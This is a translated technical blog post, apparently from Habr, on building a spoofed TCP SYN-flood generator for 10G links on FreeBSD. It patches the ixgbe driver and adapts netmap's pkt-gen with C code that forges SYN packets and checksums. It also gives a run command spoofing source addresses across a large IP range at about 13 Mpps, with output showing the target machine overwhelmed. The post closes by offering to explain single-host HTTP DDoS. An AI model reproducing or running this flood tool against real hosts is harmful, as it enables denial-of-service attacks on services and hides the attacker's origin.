
14 Mpps of SYN flood, or a 14 Mpps load fork

Lately something has pushed me to write notes, so while the enthusiasm has not faded, I am paying off my debts.
A year ago I came to Habr with the article "TCP (syn-flood) netmap generator with a capacity of 1.5 mpps", after which many people wrote and even called, asking me to describe how to build the same "fork" with spoofing at the full capacity of a 10G link. I promised everyone, but never got around to it.
Some will say this is a guide for hackers, but a pig will find dirt anyway, while those who need this tool for legitimate purposes would be left with nothing.


So, let's begin.

As usual, first, what we are working with:
 # uname -orp
 FreeBSD 10.0-STABLE amd64
 # pciconf -lv | grep -i device | grep -i network
     device = '82599EB 10-Gigabit SFI/SFP+ Network Connection'

So, we have two ordinary commodity-grade computers, a pair of Intel 82599EB adapters and 10G SFP+ modules.

Let's start with the network cards. Network equipment manufacturers hate it when someone uses their adapters with third-party SFP modules, and as a rule a NIC from one vendor will not work "out of the box" with SFPs from other firms. There are two ways around this:
- reflash the SFP module to the desired brand;
- patch the driver.
For the first option you need a (hardware) programmer. I don't have one of my own and have no desire to drive 150 km to a friend's, so our option is to edit the source. We need to make changes in the driver, e.g. ee /usr/src/sys/dev/ixgbe/ixgbe.c
In older driver versions you need to change
 if (!(enforce_sfp & IXGBE_DEVICE_CAPS_ALLOW_ANY_SFP) && 

to
 enforce_sfp |= IXGBE_DEVICE_CAPS_ALLOW_ANY_SFP;
 if (!(enforce_sfp & IXGBE_DEVICE_CAPS_ALLOW_ANY_SFP) && 

But later Intel realized it was not worth tilting at windmills and introduced the allow_unsupported_sfp parameter:
 # grep -rni "allow_unsupported_sfp" *.c
 ixgbe.c:322:static int allow_unsupported_sfp = FALSE;

Change it to TRUE. While we are at it, add netmap to the kernel config:
 # grep netmap /usr/src/sys/amd64/conf/20140523
 device netmap

And we rebuild. The system greets us with:
WARNING: Intel (R) Network Connections are quality tested using Intel (R) Ethernet Optics. Using untested modules is not supported and may cause unstable operation or damage to the module or the adapter.
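For reference, the rebuild itself is the standard FreeBSD routine; a minimal sketch, assuming the kernel config file is the 20140523 shown in the grep above:
 # cd /usr/src
 # make buildkernel KERNCONF=20140523
 # make installkernel KERNCONF=20140523
 # reboot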

The goal was achieved: the SFP module came up and the bytes started running in both directions.
Get the netmap source
 git clone https://code.google.com/p/netmap/ 

and take netmap/examples/pkt-gen.c as a basis.
We define the structure of our packet:
 struct pkt {
	struct virt_header vh;
	struct ether_header eh;
	struct ip ip;
	struct tcphdr tcp;
	uint8_t body[2048];	// XXX hardwired
 } __attribute__((__packed__));


specify the protocol
  ip->ip_p = IPPROTO_TCP; 


and fill the structure
	tcp = &pkt->tcp;
	tcp->th_sport = htons(targ->g->src_ip.port0);
	tcp->th_dport = htons(targ->g->dst_ip.port0);
	//tcp->th_ulen = htons(paylen);
	/* Magic: taken from sbin/dhclient/packet.c */
	tcp->th_seq = ntohl(rand());	// Contains the sequence number.
	tcp->th_ack = rand();		// Contains the acknowledgement number.
	tcp->th_x2 = 0;			// Unused.
	tcp->th_off = 5;		// Contains the data offset.
	tcp->th_flags = TH_SYN;		// Contains one of the following values:
	/*
	   Flag     Value   Description
	   TH_FIN   0x01    Indicates that the transmission is finishing.
	   TH_SYN   0x02    Indicates that sequence numbers are being synchronized.
	   TH_RST   0x04    Indicates that the connection is being reset.
	   TH_PUSH  0x08    Indicates that data is being pushed to the application level.
	   TH_ACK   0x10    Indicates that the acknowledge field is valid.
	   TH_URG   0x20    Indicates that urgent data is present.
	*/
	tcp->th_win = htons(512);	// Contains the window size.
	tcp->th_sum = 0;		// Contains the checksum (filled in below).
	tcp->th_urp = 0;		// Contains the urgent pointer.
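pkt-gen fills in the rest of the IP header elsewhere in its packet-initialization code; for completeness, here is a minimal sketch of what that amounts to for our packets (field names are from netinet/ip.h, and the constants match the tos/ttl/DF values visible in the tcpdump output further down, but treat it as an illustration rather than the exact pkt-gen code):

	ip = &pkt->ip;
	ip->ip_v = IPVERSION;		/* 4 */
	ip->ip_hl = 5;			/* 20-byte header, no options */
	ip->ip_tos = IPTOS_LOWDELAY;	/* 0x10, as seen in tcpdump below */
	ip->ip_len = htons(sizeof(*ip) + sizeof(*tcp) + paylen);
	ip->ip_id = 0;
	ip->ip_off = htons(IP_DF);	/* "don't fragment" */
	ip->ip_ttl = IPDEFTTL;		/* 64 */
	ip->ip_p = IPPROTO_TCP;
	/* 128.0.0.1 to start with; pkt-gen walks the whole -s range packet by packet */
	ip->ip_src.s_addr = htonl(0x80000001);
	/* 10.90.90.55, the -d target */
	ip->ip_dst.s_addr = htonl(0x0a5a5a37);
	ip->ip_sum = 0;			/* the IP header checksum is computed afterwards */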


Essentially, that's all, but we want perfect SYNs, so we also compute the checksum of every packet being sent.
 int tcp_csum(struct ip *ip, struct tcphdr * const tcp)
 {
	u_int32_t sum = 0;
	int tcp_len = 0;

	/* Calculate total length of the TCP segment */
	tcp_len = (u_int16_t) ntohs(ip->ip_len) - (ip->ip_hl << 2);

	/* Do pseudo-header first */
	sum = sum_w((u_int16_t *)&ip->ip_src, 4);
	sum += (u_int16_t) IPPROTO_TCP;
	sum += (u_int16_t) tcp_len;

	/* Sum up tcp part */
	sum += sum_w((u_int16_t *) tcp, tcp_len >> 1);
	if (tcp_len & 1)
		sum += (u_int16_t)(((u_char *) tcp)[tcp_len - 1] << 8);

	/* Flip it & stick it */
	sum = (sum >> 16) + (sum & 0xFFFF);
	sum += (sum >> 16);

	return htons(~sum);
 }
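The listing relies on a small helper, sum_w(), that is not shown above; a minimal sketch of what it is assumed to do (one's-complement accumulation of 16-bit words):

/* Sum 'nwords' 16-bit words starting at 'buf'. Hypothetical helper matching
 * the way tcp_csum() calls it; the real one may differ in detail. */
static u_int32_t
sum_w(u_int16_t *buf, int nwords)
{
	u_int32_t sum = 0;

	while (nwords-- > 0)
		sum += *buf++;
	return (sum);
}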

Now that really is everything.
We compile. We let it rip.
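The build itself is nothing special; a rough sketch, assuming the tree cloned above and that the netmap headers sit in ../sys relative to examples/ (the examples directory also ships a Makefile you can simply run):
 # cd netmap/examples
 # cc -O2 -Wall -I../sys -o pkt-gen pkt-gen.c -lpthread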

 pkt-gen -f tx -i netmap:ix0 -s 128.0.0.1-223.255.255.254 -d 10.90.90.55 -l 60
 224.387037 main [1654] interface is netmap:ix0
 224.387098 extract_ip_range [277] range is 128.0.0.1:0 to 223.255.255.254:0
 224.387103 extract_ip_range [277] range is 10.90.90.55:0 to 10.90.90.55:0
 ifname [netmap:ix0]
 224.446848 main [1837] mapped 334980KB at 0x8019ff000
 Sending on netmap:ix0: 8 queues, 1 threads and 1 cpus.
 128.0.0.1 -> 10.90.90.55 (00:00:00:00:00:00 -> ff:ff:ff:ff:ff:ff)
 224.446868 main [1893] --- SPECIAL OPTIONS: copy
 224.446870 main [1915] Sending 512 packets every  0.000000000 s
 224.446872 main [1917] Wait 2 secs for phy reset
 226.462882 main [1919] Ready...
 ifname [netmap:ix0]
 226.462926 nm_open [461] overriding ifname ix0 ringid 0x0 flags 0x1
 226.462993 sender_body [1026] start
 227.526363 main_thread [1451] 11284469 pps (11999724 pkts in 1063384 usec)
 228.589297 main_thread [1451] 11369243 pps (12084766 pkts in 1062935 usec)
 229.652296 main_thread [1451] 12401300 pps (13119571 pkts in 1062999 usec)
 230.672799 main_thread [1451] 13262006 pps (13492911 pkts in 1020503 usec)
 231.736296 main_thread [1451] 13304686 pps (13022500 pkts in 1063497 usec)
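For those seeing pkt-gen for the first time, the options used above mean roughly the following (the exact option set varies between netmap snapshots, so check pkt-gen's own usage output):
 # -f tx                          run the transmit function
 # -i netmap:ix0                  interface to open in netmap mode
 # -s 128.0.0.1-223.255.255.254   range of (spoofed) source addresses
 # -d 10.90.90.55                 destination address
 # -l 60                          frame size in bytes (60 is the Ethernet minimum)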


We look at the "quality" of the received packets (the reported length 46 is 20 bytes of IP header + 20 of TCP + 6 of payload; add the 14-byte Ethernet header and you get the 60 bytes requested with -l 60):
 # tcpdump -vvv -n
 11:39:54.349362 IP (tos 0x10, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 46)
     129.115.75.162.0 > 10.90.90.55.0: Flags [S], cksum 0xcd54 (correct), seq 1091106137:1091106143, win 512, length 6
 11:39:54.349364 IP (tos 0x10, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 46)
     129.115.153.57.0 > 10.90.90.55.0: Flags [S], cksum 0x9755 (correct), seq 286688948:286688954, win 512, length 6
 11:39:54.349365 IP (tos 0x10, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 46)
     129.115.185.75.0 > 10.90.90.55.0: Flags [S], cksum 0xf668 (correct), seq 213892719:213892725, win 512, length 6
 11:39:54.349366 IP (tos 0x10, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 46)
     129.115.75.81.0 > 10.90.90.55.0: Flags [S], cksum 0x9e6c (correct), seq 337979969:337979975, win 512, length 6
 11:39:54.349367 IP (tos 0x10, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 46)
     129.115.151.163.0 > 10.90.90.55.0: Flags [S], cksum 0x15a5 (correct), seq 224623736:224623742, win 512, length 6
 11:39:54.349368 IP (tos 0x10, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 46)
     129.115.183.209.0 > 10.90.90.55.0: Flags [S], cksum 0xd87a (correct), seq 426044579:426044585, win 512, length 6


The receiving machine, of course, was driven into the ground:
 last pid: 57199;  load averages:  1.90,  0.74,  0.38   up 20+19:01:42  11:42:41
 134 processes: 12 running, 95 sleeping, 27 waiting
 CPU 0:  0.0% user,  0.0% nice, 52.9% system, 45.1% interrupt,  2.0% idle
 CPU 1:  0.0% user,  0.0% nice, 43.9% system, 53.3% interrupt,  2.7% idle
 CPU 2:  0.0% user,  0.0% nice, 48.6% system, 51.0% interrupt,  0.4% idle
 CPU 3:  0.0% user,  0.0% nice, 47.5% system, 51.8% interrupt,  0.8% idle
 Mem: 2624K Active, 185M Inact, 299M Wired, 417M Buf, 3473M Free
 Swap: 3978M Total, 3978M Free

   PID USERNAME PRI NICE  SIZE   RES STATE  C  TIME    CPU COMMAND
    12 root     -92    -    0K  480K CPU1   1  0:52 48.49% intr{irq257: ix0:que }
    12 root     -92    -    0K  480K CPU0   0  0:57 48.29% intr{irq256: ix0:que }
    12 root     -92    -    0K  480K RUN    2  0:51 47.75% intr{irq258: ix0:que }
    12 root     -92    -    0K  480K WAIT   3  0:51 47.56% intr{irq259: ix0:que }
     0 root     -92    0    0K  336K CPU0   0  0:57 46.29% kernel{ix0 que}
     0 root     -92    0    0K  336K RUN    2  0:47 45.46% kernel{ix0 que}
     0 root     -92    0    0K  336K CPU2   2  0:47 44.97% kernel{ix0 que}
     0 root     -92    0    0K  336K CPU1   1  0:47 44.87% kernel{ix0 que}
    11 root     155 ki31    0K   64K RUN    3 498.8H  6.69% idle{idle: cpu3}

And, of course, it could not cope with everything flying at it. Let's try to receive the same traffic with netmap tools instead.
 ./pkt-gen -f rx -i ix0
 577.317054 main [1624] interface is ix0
 577.317135 extract_ip_range [275] range is 10.0.0.1:0 to 10.0.0.1:0
 577.317141 extract_ip_range [275] range is 10.1.0.1:0 to 10.1.0.1:0
 577.636329 main [1807] mapped 334980KB at 0x8019ff000
 Receiving from netmap:ix0: 4 queues, 1 threads and 1 cpus.
 577.636386 main [1887] Wait 2 secs for phy reset
 579.645114 main [1889] Ready...
 579.645186 nm_open [457] overriding ifname ix0 ringid 0x0 flags 0x1
 580.647065 main_thread [1421] 13319133 pps (13339428 pkts in 1001793 usec)
 581.649065 main_thread [1421] 13496900 pps (13519928 pkts in 1002003 usec)
 582.651054 main_thread [1421] 13386463 pps (13409111 pkts in 1001989 usec)
 583.652280 main_thread [1421] 13309552 pps (13323384 pkts in 1001223 usec)
 Received 55348748 packets, in 4.27 seconds.
 Speed: 13.37 Mpps

So much better.
Along the way, a reminder: when the application starts, netmap detaches the adapter from the network stack, so when experimenting on a remote machine you should always have a second communication channel.
That's all about netmap. But there is still a small poll on a related topic. I am often asked whether it is possible to mount an HTTP DDoS from just one computer. The answer is: "Yes, it is possible, and it is not hard." But is it worth telling how?

Source: https://habr.com/ru/post/229733/

